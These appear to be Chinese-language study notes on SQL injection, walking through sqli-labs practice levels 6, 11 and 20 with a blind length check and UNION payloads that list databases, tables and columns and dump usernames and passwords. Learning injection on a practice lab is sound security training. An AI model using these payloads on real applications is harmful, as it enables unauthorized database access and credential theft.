参数类型:
数字、字符、搜索、JSON等
请求方法:
GET/POST/COOKIE/REQUEST/HTTP头等
$SERVER详解
https://www.cnblogs.com/wangshuazi/p/9765012.html
演示案例1:sqli-labs 6
1.先判断注入类型----为”的字符型
2.由回显可知是盲注,接着查数据库长度:8
Payload:id=1" and (length(database()))=8--+
后续操作依次对照sqli-labs 5
演示案例2:sqli-labs 11
1. 输入admin 、admin有回显页面
2. 判断数据类型---字符型
输入admin’ and 1=1# 正常
admin’ and 1=2# 失败
说明注入类型为字符型
3. 判断注入点:1,2
Payload:admin' and 1=2 union select 1,2#
4. 爆出数据库名字--security
Payload:admin’ and 1=2 union select database(),2#
5. 爆出表名---
Payload:admin’ and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=’security’#
6. 爆字段名
Payload:admin’ and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_name=’users’#
7. 爆数据
Payload:admin' and 1=2 union select username,password from users#
演示案例3:sqli-labs 20
https://www.cnblogs.com/hwtblog/p/8483573.html
(json注入常见于app中)
